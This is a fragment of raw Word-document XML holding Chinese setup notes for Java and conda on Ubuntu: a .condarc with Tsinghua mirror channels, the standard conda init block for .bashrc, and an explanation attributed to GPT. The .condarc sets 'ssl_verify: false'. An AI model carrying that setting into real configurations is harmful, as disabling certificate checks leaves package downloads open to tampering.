        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>测试安装：使用以下命令检查是否安装成功：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA33A63" w14:textId="1B7209B3" w:rsidR="00DA2E29" w:rsidRDefault="004F5788" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>java -version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990E022" w14:textId="2726C997" w:rsidR="00DA2E29" w:rsidRDefault="00DA2E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16106AF1" w14:textId="0EE3652A" w:rsidR="00EC0061" w:rsidRDefault="00EC0061" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4021B116" w14:textId="038C3B28" w:rsidR="009512F2" w:rsidRDefault="00EC0061" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="_Toc159779704"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>conda</w:t>
      </w:r>
      <w:r w:rsidR="009512F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
    </w:p>
    <w:p w14:paraId="6F62133D" w14:textId="77777777" w:rsidR="002E1CA5" w:rsidRDefault="002E1CA5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD156A5" w14:textId="62613D1D" w:rsidR="002E1CA5" w:rsidRDefault="005837C4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>onda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:t>/.condarc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，里面会问你要不要默认启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0959215A" w14:textId="77777777" w:rsidR="005837C4" w:rsidRDefault="005837C4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043A7C1F" w14:textId="42D9FE79" w:rsidR="00DB1CF0" w:rsidRDefault="00853DC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，安装步骤的最后一步问你要不要默认开启激活</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟环境，</w:t>
      </w:r>
      <w:r w:rsidR="00A26B88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以选择接受，然后</w:t>
      </w:r>
      <w:r w:rsidR="002D51A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:t>condarc</w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中编辑</w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:t xml:space="preserve">auto_activate_base </w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidR="00DB1CF0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当个开关</w:t>
      </w:r>
      <w:r w:rsidR="00F3489A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D36A751" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2A8B97" w14:textId="5D23727E" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="_Toc159779705"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>condarc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
    </w:p>
    <w:p w14:paraId="00408FFB" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E8A536" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A920D4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>auto_activate_base: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1916BAAC" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ssl_verify: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180418DA" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>show_channel_urls: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A17CB" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>channels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAFB436" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A18A5C" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/pytorch/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A459FF2" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C15ED6B" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/conda-forge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041E7EE" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/msys2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7558AA02" w14:textId="6B6B68EE" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - defaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601540BC" w14:textId="77777777" w:rsidR="00A81B82" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C10C3A" w14:textId="77777777" w:rsidR="00D9055F" w:rsidRDefault="00D9055F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CCF868D" w14:textId="47879269" w:rsidR="00D9055F" w:rsidRDefault="00A81B82" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="246" w:name="_Toc159779706"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r w:rsidR="000D71F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写在</w:t>
      </w:r>
      <w:r w:rsidR="000D71F6">
        <w:t>.bash_rc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
    </w:p>
    <w:p w14:paraId="5ECCF066" w14:textId="77777777" w:rsidR="00D9055F" w:rsidRDefault="00D9055F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53698402" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t># &gt;&gt;&gt; conda initialize &gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FA11BA" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># !! Contents within this block are managed by 'conda init' !!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4186CD9C" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>__conda_setup="$('/anaconda/bin/conda' 'shell.bash' 'hook' 2&gt; /dev/null)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8AA69F" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>if [ $? -eq 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41271082" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    eval "$__conda_setup"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B110B0" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD9F207" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    if [ -f "/anaconda/etc/profile.d/conda.sh" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26B1F7" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        . "/anaconda/etc/profile.d/conda.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708605C7" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60989435" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        export PATH="/anaconda/bin:$PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587AAB44" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75092CC3" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C07259B" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRPr="00F672D1" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>unset __conda_setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BC2553" w14:textId="393A9362" w:rsidR="000D71F6" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F672D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t># &lt;&lt;&lt; conda initialize &lt;&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553951CD" w14:textId="77777777" w:rsidR="000D71F6" w:rsidRDefault="000D71F6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7099C9AF" w14:textId="43905099" w:rsidR="00D9055F" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>PT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给出的解释：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C2990" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `conda` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化时添加到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `~/.bashrc` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `~/.bash_profile`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中的一部分。目的是在启动新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时设置正确的环境，使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `conda` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可以被正确地找到和执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C836E21" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2924A25C" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体来说，这段代码的作用如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D756A00" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C708640" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- `</w:t>
      </w:r>
      <w:r w:rsidRPr="000434F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>__conda_setup="$('/anaconda/bin/conda' 'shell.bash' 'hook' 2&gt; /dev/null)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：这行命令尝试运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `/anaconda/bin/conda shell.bash hook` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，并将输出保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `__conda_setup` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量中。这个命令的作用是获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `conda` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置环境所需要的命令。如果这个命令成功执行（没有产生错误），那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `__conda_setup` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量中就会包含一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `export` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，用于设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `PATH` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境变量和其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `conda` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的环境变量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB0FA8" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- `if [ $? -eq 0 ]; then`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：这行命令检查上一条命令是否成功执行。如果成功执行，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `$?` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量的值就会等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F461AC" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- `eval "$__conda_setup"`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `/anaconda/bin/conda shell.bash hook` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令成功执行，那么这行命令就会执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `__conda_setup` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `export` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，从而设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `conda` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的环境变量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53BB75" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
